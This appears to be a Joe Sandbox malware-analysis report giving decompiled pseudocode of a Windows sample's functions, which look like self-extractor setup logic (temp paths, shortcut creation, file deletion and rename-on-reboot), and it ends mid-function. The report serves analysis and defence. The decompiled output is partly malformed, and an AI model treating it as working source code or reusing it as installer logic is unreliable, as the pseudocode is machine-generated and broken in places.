                • Instruction ID: d55a354ae050f49e067aeaaf600e319335b1548b2a3ae78f193ef0c008889710
                • Opcode Fuzzy Hash: 47c900ea35d046b06a6e4af3e08331dbfe13329c12d1a6b7dc96df7d97649d6a
                • Instruction Fuzzy Hash: E241C1322487819AD732DF25EE45FEEBBE99B85300F04091EF5D1972C0D6B49A48DB53
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 83%
                			E003FC988(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t54;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t66;
				short* _t67;
				signed int _t68;
				short* _t69;

				_t65 = __edx;
				_t34 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t34 ^ _t68;
				E003F4636(_t55,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x2de85006
					_t54 =  *_t6;
					_t57 = _t54;
					_a24 = _t54;
				}
				_t66 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E003EFBBC(_t66, _t55, _v8 ^ _t68, _t65, _t66, _t67);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t67 = 0;
					L11:
					if(_t67 != 0) {
						E003EFFF0(_t66, _t67, _t66, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t67, _v12);
						if(_t46 != 0) {
							_t66 = GetStringTypeW(_a8, _t67, _t46, _a20);
						}
					}
					L14:
					E003FABC3(_t67);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t67 = E003F8E06(_t63, _t48 & _t63);
					if(_t67 == 0) {
						goto L14;
					}
					 *_t67 = 0xdddd;
					L9:
					_t67 =  &(_t67[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00402010(_t48 & _t63);
				_t67 = _t69;
				if(_t67 == 0) {
					goto L14;
				}
				 *_t67 = 0xcccc;
				goto L9;
			}























                0x003fc988
                0x003fc990
                0x003fc997
                0x003fc9a3
                0x003fc9a8
                0x003fc9ad
                0x003fc9b2
                0x003fc9b2
                0x003fc9b5
                0x003fc9b7
                0x003fc9b7
                0x003fc9bc
                0x003fc9d5
                0x003fc9db
                0x003fc9e0
                0x003fca7f
                0x003fca83
                0x003fca88
                0x003fca88
                0x003fcaa4
                0x003fcaa4
                0x003fc9e6
                0x003fc9ee
                0x003fc9f2
                0x003fca3e
                0x003fca40
                0x003fca42
                0x003fca47
                0x003fca5e
                0x003fca66
                0x003fca76
                0x003fca76
                0x003fca66
                0x003fca78
                0x003fca79
                0x00000000
                0x003fca7e
                0x003fc9f9
                0x003fc9fb
                0x003fc9fd
                0x003fca05
                0x003fca22
                0x003fca2c
                0x003fca31
                0x00000000
                0x00000000
                0x003fca33
                0x003fca39
                0x003fca39
                0x00000000
                0x003fca39
                0x003fca09
                0x003fca0d
                0x003fca12
                0x003fca16
                0x00000000
                0x00000000
                0x003fca18
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,003F47C6,00000000,00000000,003F57FB,?,003F57FB,?,00000001,003F47C6,2DE85006,00000001,003F57FB,003F57FB), ref: 003FC9D5
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003FCA5E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 003FCA70
                • __freea.LIBCMT ref: 003FCA79
                  • Part of subcall function 003F8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: a6490302f8667a261611d96cf52e2aa011fd613b5516e82c185879fe8d501e3c
                • Instruction ID: 53af53c57c8460bd9a0ff6cfbd5712dab425bd6324bed0f3ab8282f6dff695e3
                • Opcode Fuzzy Hash: a6490302f8667a261611d96cf52e2aa011fd613b5516e82c185879fe8d501e3c
                • Instruction Fuzzy Hash: 1131CD72A1021EABDF26CF64CD41DBE7BA5EF41310B054268FD04EA290EB35DD50CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EA663() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0x418430 = GetDeviceCaps(_t5, 0x58);
					 *0x418434 = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}





                0x003ea666
                0x003ea66c
                0x003ea670
                0x003ea67e
                0x003ea68c
                0x00000000
                0x003ea691
                0x003ea698

                APIs
                • GetDC.USER32(00000000), ref: 003EA666
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 003EA675
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003EA683
                • ReleaseDC.USER32(00000000,00000000), ref: 003EA691
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 8d87680e34a0a1a063b67c6b21ae8af8d5651cd79b4b1665ec50b520d8e92e57
                • Instruction ID: 390001908aff0f6bccaacaaff8e247e400558246bc035501656ff81cf5936932
                • Opcode Fuzzy Hash: 8d87680e34a0a1a063b67c6b21ae8af8d5651cd79b4b1665ec50b520d8e92e57
                • Instruction Fuzzy Hash: CDE08C31942B31A7C2251F60AC0DBCA3E24AB05B53F019120FA059A1D4EB6486008BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003ED06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E003ED06A(intOrPtr __ebx, long __edi) {
				intOrPtr _t225;
				void* _t226;
				long _t289;
				signed int _t290;
				void* _t292;
				signed int _t293;
				void* _t297;

				L0:
				while(1) {
					L0:
					_t289 = __edi;
					if(__ebx != 6) {
						goto L175;
					}
					L133:
					__eax = 0;
					 *(__ebp - 0x2844) = __ax;
					__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
					__eax = E003F79E9( *(__ebp - 0x1b894) & 0x0000ffff);
					__eflags = __eax - 0x50;
					if(__eax == 0x50) {
						 *(__ebp - 0x14) = 2;
						__eax = 0x42cb82;
					} else {
						__eflags = __eax - 0x54;
						if(__eax == 0x54) {
							 *(__ebp - 0x14) = 7;
							__eax = 0x42bb82;
						} else {
							 *(__ebp - 0x14) = 0x10;
							__eax = 0x42db82;
						}
					}
					__esi = 0x800;
					__ebp - 0x2844 = E003E0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
					__eax = 0;
					 *(__ebp - 0x9894) = __ax;
					 *(__ebp - 0x1844) = __ax;
					__ebp - 0x19894 = __ebp - 0x688c;
					__eax = E003E0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
					__ebx = 0x22;
					__eflags =  *(__ebp - 0x688c) - __bx;
					if( *(__ebp - 0x688c) != __bx) {
						L141:
						__ebp - 0x688c = E003DA231(__ebp - 0x688c);
						__eflags = __al;
						if(__al != 0) {
							goto L160;
						}
						L142:
						__ax =  *(__ebp - 0x688c);
						__esi = __ebp - 0x688c;
						__ebx = __edi;
						__eflags = __ax;
						if(__ax == 0) {
							L159:
							__esi = 0x800;
							goto L160;
						}
						L143:
						__edi = __ax & 0x0000ffff;
						do {
							L144:
							__eax = 0x20;
							__eflags = __di - __ax;
							if(__di == __ax) {
								L146:
								__eax = 0;
								__esi->i = __ax;
								__ebp - 0x688c = E003DA231(__ebp - 0x688c);
								__eflags = __al;
								if(__al == 0) {
									L155:
									__esi->i = __di;
									goto L156;
								}
								L147:
								__ebp - 0x688c = E003DA243(__ebp - 0x688c);
								__eax = E003DA28F(__eax);
								__eflags = __al;
								if(__al != 0) {
									goto L155;
								}
								L148:
								__ecx = 0x2f;
								__eax =  &(__esi->i);
								__ebx = __esi;
								__eflags = __di - __cx;
								if(__di != __cx) {
									L150:
									__esi = __eax;
									__eax = 0x20;
									while(1) {
										L152:
										__eflags = __esi->i - __ax;
										if(__esi->i != __ax) {
											break;
										}
										L151:
										__esi =  &(__esi->i);
										__eflags = __esi;
									}
									L153:
									__ecx = __ebp - 0x1844;
									__eax = __esi;
									__edx = 0x400;
									L154:
									__eax = E003E0602(__ecx, __eax, __edx);
									 *__ebx = __di;
									goto L156;
								}
								L149:
								 *(__ebp - 0x1844) = __cx;
								__edx = 0x3ff;
								__ecx = __ebp - 0x1842;
								goto L154;
							}
							L145:
							__eax = 0x2f;
							__eflags = __di - __ax;
							if(__di != __ax) {
								goto L156;
							}
							goto L146;
							L156:
							__esi =  &(__esi->i);
							__eax = __esi->i & 0x0000ffff;
							__edi = __esi->i & 0x0000ffff;
							__eflags = __ax;
						} while (__ax != 0);
						__esi = 0x800;
						__eflags = __ebx;
						if(__ebx != 0) {
							__eax = 0;
							 *__ebx = __ax;
						}
						goto L160;
					} else {
						L139:
						__ebp - 0x19892 = __ebp - 0x688c;
						E003E0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
						_push(__ebp - 0x688a);
						__eax = E003F22C6(__ecx);
						_pop(__ecx);
						__ecx = __ebx;
						__eflags = __eax;
						if(__eax != 0) {
							__ecx = 0;
							 *__eax = __cx;
							__ebp - 0x1844 = E003E0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
						}
						L160:
						__eflags =  *((short*)(__ebp - 0x11894));
						if( *((short*)(__ebp - 0x11894)) != 0) {
							__ebp - 0x9894 = __ebp - 0x11894;
							__eax = E003DB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
						}
						__ebp - 0xb894 = __ebp - 0x688c;
						__eax = E003DB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
						__eflags =  *(__ebp - 0x2844);
						if(__eflags == 0) {
							__ebp - 0x2844 = E003EB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
						}
						__ebp - 0x2844 = E003DB690(__eflags, __ebp - 0x2844, __esi);
						__eflags =  *((short*)(__ebp - 0x17894));
						if(__eflags != 0) {
							__ebp - 0x17894 = __ebp - 0x2844;
							E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
							__eax = E003DB690(__eflags, __ebp - 0x2844, __esi);
						}
						__ebp - 0x2844 = __ebp - 0xc894;
						__eax = E003E0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
						__eflags =  *(__ebp - 0x13894);
						__eax = __ebp - 0x13894;
						if(__eflags == 0) {
							__eax = __ebp - 0x19894;
						}
						__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
						__eax = __ebp - 0x2844;
						__eflags = E003DB92D(__ebp - 0x2844);
						if(__eflags == 0) {
							L170:
							__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
							goto L171;
						} else {
							L169:
							__eflags = __eax;
							if(__eflags == 0) {
								L171:
								__ebx = 0;
								__ebp - 0x2844 = E003DA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
								__ebp - 0xb894 = __ebp - 0xa894;
								E003E0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
								__eax = E003DC2E4(__eflags, __ebp - 0xa894);
								__esi =  *(__ebp - 0x1844) & 0x0000ffff;
								__eax = __ebp - 0x1844;
								__edx =  *(__ebp - 0x9894) & 0x0000ffff;
								__edi = __ebp - 0xa894;
								__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
								__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
								asm("sbb esi, esi");
								__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
								__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
								__eax = __ebp - 0x9894;
								asm("sbb edx, edx");
								__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
								__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
								__eax = __ebp - 0x15894;
								asm("sbb ecx, ecx");
								__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
								 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
								asm("sbb eax, eax");
								 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
								__ebp - 0xb894 = E003EA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
								__eflags =  *(__ebp - 0xc894) - __bx;
								if( *(__ebp - 0xc894) != __bx) {
									__eax = __ebp - 0xc894;
									__eax =  *0x43308c(0x1000, 5, __ebp - 0xc894, 0);
								}
								while(1) {
									L175:
									_push(0x1000);
									_t213 = _t297 - 0x15; // 0xffffa75f
									_t214 = _t297 - 0xd; // 0xffffa767
									_t215 = _t297 - 0x588c; // 0xffff4ee8
									_t216 = _t297 - 0xf894; // 0xfffeaee0
									_push( *((intOrPtr*)(_t297 + 0xc)));
									_t225 = E003EB314(_t289, _t297);
									_t277 =  *((intOrPtr*)(_t297 + 0x10));
									 *((intOrPtr*)(_t297 + 0xc)) = _t225;
									if(_t225 != 0) {
										_t226 = _t297 - 0x588c;
										_t292 = _t297 - 0x1b894;
										_t290 = 6;
										goto L2;
									} else {
										break;
									}
									L4:
									while(E003E1FBB(_t297 - 0xf894,  *((intOrPtr*)(0x40e744 + _t293 * 4))) != 0) {
										_t293 = _t293 + 1;
										if(_t293 < 0xe) {
											continue;
										} else {
											goto L175;
										}
									}
									__eflags = _t293 - 0xd;
									if(_t293 > 0xd) {
										continue;
									}
									L8:
									switch( *((intOrPtr*)(_t293 * 4 +  &M003ED41B))) {
										case 0:
											L9:
											__eflags = _t277 - 2;
											if(_t277 == 2) {
												_t289 = 0x800;
												E003EA64D(_t297 - 0x788c, 0x800);
												E003DA544(E003DBDF3(__eflags, _t297 - 0x788c, _t297 - 0x588c, _t297 - 0xd894, 0x800), _t277, _t297 - 0x8894, _t293);
												 *(_t297 - 4) = 0;
												E003DA67E(_t297 - 0x8894, _t297 - 0xd894);
												E003D6EDB(_t297 - 0x388c);
												while(1) {
													L23:
													_push(0);
													_t240 = E003DA5D1(_t297 - 0x8894, _t297 - 0x388c);
													__eflags = _t240;
													if(_t240 == 0) {
														break;
													}
													L11:
													SetFileAttributesW(_t297 - 0x388c, 0);
													__eflags =  *(_t297 - 0x2880);
													if(__eflags == 0) {
														L16:
														_t244 = GetFileAttributesW(_t297 - 0x388c);
														__eflags = _t244 - 0xffffffff;
														if(_t244 == 0xffffffff) {
															continue;
														}
														L17:
														_t246 = DeleteFileW(_t297 - 0x388c);
														__eflags = _t246;
														if(_t246 != 0) {
															continue;
														} else {
															_t295 = 0;
															_push(0);
															goto L20;
															L20:
															E003D4092(_t297 - 0x1044, _t289, L"%s.%d.tmp", _t297 - 0x388c);
															_t299 = _t299 + 0x14;
															_t251 = GetFileAttributesW(_t297 - 0x1044);
															__eflags = _t251 - 0xffffffff;
															if(_t251 != 0xffffffff) {
																_t295 = _t295 + 1;
																__eflags = _t295;
																_push(_t295);
																goto L20;
															} else {
																_t254 = MoveFileW(_t297 - 0x388c, _t297 - 0x1044);
																__eflags = _t254;
																if(_t254 != 0) {
																	MoveFileExW(_t297 - 0x1044, 0, 4);
																}
																continue;
															}
														}
													}
													L12:
													E003DB991(__eflags, _t297 - 0x788c, _t297 - 0x1044, _t289);
													E003DB690(__eflags, _t297 - 0x1044, _t289);
													_t296 = E003F3E13(_t297 - 0x788c);
													__eflags = _t296 - 4;
													if(_t296 < 4) {
														L14:
														_t265 = E003DBDB4(_t297 - 0x588c);
														__eflags = _t265;
														if(_t265 != 0) {
															break;
														}
														L15:
														_t268 = E003F3E13(_t297 - 0x388c);
														__eflags = 0;
														 *((short*)(_t297 + _t268 * 2 - 0x388a)) = 0;
														E003EFFF0(_t289, _t297 - 0x44, 0, 0x1e);
														_t299 = _t299 + 0x10;
														 *((intOrPtr*)(_t297 - 0x40)) = 3;
														_push(0x14);
														_pop(_t271);
														 *((short*)(_t297 - 0x34)) = _t271;
														 *((intOrPtr*)(_t297 - 0x3c)) = _t297 - 0x388c;
														_push(_t297 - 0x44);
														 *0x43307c();
														goto L16;
													}
													L13:
													_t276 = E003F3E13(_t297 - 0x1044);
													__eflags = _t296 - _t276;
													if(_t296 > _t276) {
														goto L15;
													}
													goto L14;
												}
												L24:
												 *(_t297 - 4) =  *(_t297 - 4) | 0xffffffff;
												E003DA55A(_t297 - 0x8894);
											}
											goto L175;
										case 1:
											L25:
											__eflags = __ebx;
											if(__ebx != 0) {
												goto L175;
											} else {
												__eax =  *0x42fc94;
												__eflags = __eax;
												__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
												__eflags = __eax;
												if(__eax != 0) {
													__eax =  *0x42fc94;
													_pop(__ecx);
													_pop(__ecx);
												}
												__bh =  *((intOrPtr*)(__ebp - 0xd));
												__eflags = __bh;
												if(__eflags == 0) {
													__eax = __ebp + 0xc;
													_push(__ebp + 0xc);
													__esi = E003EB48E(__ecx, __edx, __eflags);
													__eax =  *0x42fc94;
												} else {
													__esi = __ebp - 0x588c;
												}
												__eflags = __bl;
												if(__bl == 0) {
													__edi = __eax;
												}
												L33:
												__eax = E003F3E13(__esi);
												__eax = __eax + __edi;
												_push(__eax);
												_push( *0x42fc94);
												__eax = E003F3E3E(__ecx, __edx);
												__esp = __esp + 0xc;
												__eflags = __eax;
												if(__eax == 0) {
													L37:
													__eflags = __bh;
													if(__bh == 0) {
														__eax = L003F3E2E(__esi);
													}
													goto L175;
												}
												L34:
												 *0x42fc94 = __eax;
												__eflags = __bl;
												if(__bl != 0) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
												L36:
												__eax = E003F7686(__eax, __esi);
												_pop(__ecx);
												_pop(__ecx);
												goto L37;
											}
										case 2:
											L39:
											__eflags = __ebx;
											if(__ebx == 0) {
												__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
											}
											goto L175;
										case 3:
											L41:
											__eflags = __ebx;
											if(__ebx != 0) {
												goto L175;
											}
											L42:
											__eflags =  *0x41a472 - __di;
											if( *0x41a472 != __di) {
												goto L175;
											}
											L43:
											__eax = 0;
											__edi = __ebp - 0x588c;
											_push(0x22);
											 *(__ebp - 0x1044) = __ax;
											_pop(__eax);
											__eflags =  *(__ebp - 0x588c) - __ax;
											if( *(__ebp - 0x588c) == __ax) {
												__edi = __ebp - 0x588a;
											}
											__eax = E003F3E13(__edi);
											__esi = 0x800;
											__eflags = __eax - 0x800;
											if(__eax >= 0x800) {
												goto L175;
											} else {
												L46:
												__eax =  *__edi & 0x0000ffff;
												_push(0x5c);
												_pop(__ecx);
												__eflags = ( *__edi & 0x0000ffff) - 0x2e;
												if(( *__edi & 0x0000ffff) != 0x2e) {
													L50:
													__eflags = __ax - __cx;
													if(__ax == __cx) {
														L62:
														__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, __esi);
														__ebx = 0;
														__eflags = 0;
														L63:
														_push(0x22);
														_pop(__eax);
														__eax = __ebp - 0x1044;
														__eax = E003F279B(__ebp - 0x1044, __ebp - 0x1044);
														_pop(__ecx);
														_pop(__ecx);
														__eflags = __eax;
														if(__eax != 0) {
															__eflags =  *(__eax + 2) - __bx;
															if( *(__eax + 2) == __bx) {
																__ecx = 0;
																__eflags = 0;
																 *__eax = __cx;
															}
														}
														__eax = __ebp - 0x1044;
														__edi = 0x41a472;
														E003E0602(0x41a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
														__eax = E003EB1BE(__ebp - 0x1044, __esi);
														__esi = GetDlgItem( *(__ebp + 8), 0x66);
														__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
														__eax = SendMessageW(__esi, 0x143, __ebx, 0x41a472); // executed
														__eax = __ebp - 0x1044;
														__eax = E003F3E49(__ebp - 0x1044, 0x41a472, __eax);
														_pop(__ecx);
														_pop(__ecx);
														__eflags = __eax;
														if(__eax != 0) {
															__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
														}
														goto L175;
													}
													L51:
													__eflags = __ax;
													if(__ax == 0) {
														L53:
														__eax = __ebp - 0x1c;
														__ebx = 0;
														_push(__ebp - 0x1c);
														_push(1);
														_push(0);
														_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
														_push(0x80000002);
														__eax =  *0x433028();
														__eflags = __eax;
														if(__eax == 0) {
															__eax = __ebp - 0x14;
															 *(__ebp - 0x14) = 0x1000;
															_push(__ebp - 0x14);
															__eax = __ebp - 0x1044;
															_push(__ebp - 0x1044);
															__eax = __ebp - 0x24;
															_push(__ebp - 0x24);
															_push(0);
															_push(L"ProgramFilesDir");
															_push( *(__ebp - 0x1c));
															__eax =  *0x433024();
															_push( *(__ebp - 0x1c));
															 *0x433008() =  *(__ebp - 0x14);
															__ecx = 0x7ff;
															__eax =  *(__ebp - 0x14) >> 1;
															__eflags = __eax - 0x7ff;
															if(__eax >= 0x7ff) {
																__eax = 0x7ff;
															}
															__ecx = 0;
															__eflags = 0;
															 *(__ebp + __eax * 2 - 0x1044) = __cx;
														}
														__eflags =  *(__ebp - 0x1044) - __bx;
														if( *(__ebp - 0x1044) != __bx) {
															__eax = __ebp - 0x1044;
															__eax = E003F3E13(__ebp - 0x1044);
															_push(0x5c);
															_pop(__ecx);
															__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
															if(__eflags != 0) {
																__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, "\\", __esi);
															}
														}
														__esi = E003F3E13(__edi);
														__eax = __ebp - 0x1044;
														__eflags = __esi - 0x7ff;
														__esi = 0x800;
														if(__eflags < 0) {
															__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
														}
														goto L63;
													}
													L52:
													__eflags =  *((short*)(__edi + 2)) - 0x3a;
													if( *((short*)(__edi + 2)) == 0x3a) {
														goto L62;
													}
													goto L53;
												}
												L47:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
												if( *((intOrPtr*)(__edi + 2)) != __cx) {
													goto L51;
												}
												L48:
												__edi = __edi + 4;
												__ebx = 0;
												__eflags =  *__edi - __bx;
												if( *__edi == __bx) {
													goto L175;
												}
												L49:
												__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, 0x800);
												goto L63;
											}
										case 4:
											L68:
											__eflags =  *0x41a46c - 1;
											__eflags = __eax - 0x41a46c;
											 *__edi =  *__edi + __ecx;
											__eflags =  *(__edx + 7) & __al;
											 *__eax =  *__eax + __al;
											__eflags =  *__eax;
										case 5:
											L73:
											__eax =  *(__ebp - 0x588c) & 0x0000ffff;
											__ecx = 0;
											__eax =  *(__ebp - 0x588c) & 0x0000ffff;
											__eflags = __eax;
											if(__eax == 0) {
												L80:
												 *0x418457 = __cl;
												 *0x418460 = 1;
												goto L175;
											}
											L74:
											__eax = __eax - 0x30;
											__eflags = __eax;
											if(__eax == 0) {
												L78:
												 *0x418457 = __cl;
												L79:
												 *0x418460 = __cl;
												goto L175;
											}
											L75:
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												goto L80;
											}
											L76:
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax != 0) {
												goto L175;
											}
											L77:
											 *0x418457 = 1;
											goto L79;
										case 6:
											L86:
											__edi = 0;
											 *0x41c577 = 1;
											__edi = 1;
											__eax = __ebp - 0x588c;
											__eflags =  *(__ebp - 0x588c) - 0x3c;
											__ebx = __esi;
											 *(__ebp - 0x14) = __eax;
											if( *(__ebp - 0x588c) != 0x3c) {
												L97:
												__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
												if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
													L100:
													__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
													if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
														goto L175;
													}
													L101:
													__eflags = __ebx - 6;
													if(__ebx != 6) {
														goto L175;
													}
													L102:
													__ecx = 0;
													__eflags = 0;
													_push(0);
													L103:
													_push(__edi);
													_push(__eax);
													_push( *(__ebp + 8));
													__eax = E003ED78F(__ebp);
													goto L175;
												}
												L98:
												__eflags = __ebx - 9;
												if(__ebx != 9) {
													goto L175;
												}
												L99:
												_push(1);
												goto L103;
											}
											L87:
											__eax = __ebp - 0x588a;
											_push(0x3e);
											_push(__ebp - 0x588a);
											__eax = E003F22C6(__ecx);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax == 0) {
												L96:
												__eax =  *(__ebp - 0x14);
												goto L97;
											}
											L88:
											_t103 = __eax + 2; // 0x2
											__ecx = _t103;
											 *(__ebp - 0x14) = _t103;
											__ecx = 0;
											 *__eax = __cx;
											__eax = __ebp - 0x10c;
											_push(0x64);
											_push(__ebp - 0x10c);
											__eax = __ebp - 0x588a;
											_push(__ebp - 0x588a);
											__eax = E003EAF98();
											 *(__ebp - 0x20) = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												goto L96;
											}
											L89:
											__esi = __eax;
											while(1) {
												L90:
												__eflags =  *(__ebp - 0x10c);
												if( *(__ebp - 0x10c) == 0) {
													goto L96;
												}
												L91:
												__eax = __ebp - 0x10c;
												__eax = E003E1FBB(__ebp - 0x10c, L"HIDE");
												__eax =  ~__eax;
												asm("sbb eax, eax");
												__edi = __edi & __eax;
												__eax = __ebp - 0x10c;
												__eax = E003E1FBB(__ebp - 0x10c, L"MAX");
												__eflags = __eax;
												if(__eax == 0) {
													_push(3);
													_pop(__edi);
												}
												__eax = __ebp - 0x10c;
												__eax = E003E1FBB(__ebp - 0x10c, L"MIN");
												__eflags = __eax;
												if(__eax == 0) {
													_push(6);
													_pop(__edi);
												}
												_push(0x64);
												__eax = __ebp - 0x10c;
												_push(__ebp - 0x10c);
												_push(__esi);
												__esi = E003EAF98();
												__eflags = __esi;
												if(__esi != 0) {
													continue;
												} else {
													goto L96;
												}
											}
											goto L96;
										case 7:
											L107:
											__eflags = __ebx - 1;
											if(__eflags != 0) {
												L124:
												__eflags = __ebx - 7;
												if(__ebx == 7) {
													__eflags =  *0x41a46c - __edi;
													if( *0x41a46c == __edi) {
														 *0x41a46c = 2;
													}
													 *0x419468 = 1;
												}
												goto L175;
											}
											L108:
											__eax = __ebp - 0x788c;
											__edi = 0x800;
											GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
											__eax = E003DB690(__eflags, __ebp - 0x788c, 0x800);
											__ebx = 0;
											__esi = 0;
											_push(0);
											while(1) {
												L110:
												_push( *0x40e724);
												__ebp - 0x788c = E003D4092(0x41946a, __edi, L"%s%s%u", __ebp - 0x788c);
												__eax = E003DA231(0x41946a);
												__eflags = __al;
												if(__al == 0) {
													break;
												}
												L109:
												__esi =  &(__esi->i);
